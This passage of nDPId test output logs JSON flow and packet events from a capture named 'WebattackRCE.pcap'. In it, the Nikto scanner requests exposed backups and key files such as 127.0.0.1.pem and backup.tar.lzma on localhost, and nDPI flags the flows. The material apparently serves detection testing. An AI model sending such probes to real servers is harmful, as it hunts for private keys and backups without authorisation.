{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277130,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":1,"flow_last_seen":1576420277130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277130,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JsdAAEAGFXJ\/AAABfwAAAcPOH5Ap0h5I7vzLNIAYAED+sQAAAQEICp1m\/LKdZvyyR0VUIC8xLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":291,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277130,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277134,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":1,"flow_last_seen":1576420277134,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277134,"pkt":"AAAAAAAAAAAAAAAACABFAAC9UWBAAEAG6th\/AAABfwAAAcPQH5CgyWnegf\/5dIAYAED+sQAAAQEICp1m\/LWdZvy1R0VUIC8xLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":292,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277134,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277136,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":1,"flow_last_seen":1576420277136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277136,"pkt":"AAAAAAAAAAAAAAAACABFAADFelpAAEAGwdZ\/AAABfwAAAcPSH5CODELdlJWwD4AYAED+uQAAAQEICp1m\/LedZvy3R0VUIC8xMjcuMC4wLjEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277136,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277141,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":1,"flow_last_seen":1576420277141,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277141,"pkt":"AAAAAAAAAAAAAAAACABFAADF+nFAAEAGQb9\/AAABfwAAAcPUH5Dn1sLrZe4ChoAYAED+uQAAAQEICp1m\/L2dZvy9R0VUIC8xMjcuMC4wLjEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277141,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277142,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":1,"flow_last_seen":1576420277142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277142,"pkt":"AAAAAAAAAAAAAAAACABFAADHb5RAAEAGzJp\/AAABfwAAAcPWH5B0BVcY3NxdJYAYAED+uwAAAQEICp1m\/L6dZvy+R0VUIC9iYWNrdXAudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
-01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277142,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277144,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":1576420277144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277144,"pkt":"AAAAAAAAAAAAAAAACABFAADHO5VAAEAGAJp\/AAABfwAAAcPYH5AuGgMWrL1WfYAYAED+uwAAAQEICp1m\/MCdZvzAR0VUIC9iYWNrdXAudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277144,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277145,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":1576420277145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277145,"pkt":"AAAAAAAAAAAAAAAACABFAADD1QZAAEAGZyx\/AAABfwAAAcPaH5AWHu2DG+Oig4AYAED+twAAAQEICp1m\/MGdZvzBR0VUIC8xMjcuMC4wLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277145,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277148,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":1576420277148,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277148,"pkt":"AAAAAAAAAAAAAAAACABFAADDYFdAAEAG29t\/AAABfwAAAcPcH5BE+VjTl6\/NvYAYAED+twAAAQEICp1m\/MSdZvzER0VUIC8xMjcuMC4wLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277148,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277153,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":1576420277153,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277153,"pkt":"AAAAAAAAAAAAAAAACABFAADCOn5AAEAGAbZ\/AAABfwAAAcPeH5C7hwL1asNzroAYAED+tgAAAQEICp1m\/MmdZvzJR0VUIC8xMjcwMDEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277153,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277155,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":1576420277155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277155,"pkt":"AAAAAAAAAAAAAAAACABFAADCDytAAEAGLQl\/AAABfwAAAcPgH5C7IzeiGEGCK4AYAED+tgAAAQEICp1m\/MudZvzLR0VUIC8xMjcwMDEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277155,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277157,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":1576420277157,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277157,"pkt":"AAAAAAAAAAAAAAAACABFAADJ8y5AAEAGSP5\/AAABfwAAAcPiH5D9g8umqBgGFIAYAED+vQAAAQEICp1m\/M2dZvzNR0VUIC8xMjcuMC4wLjEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
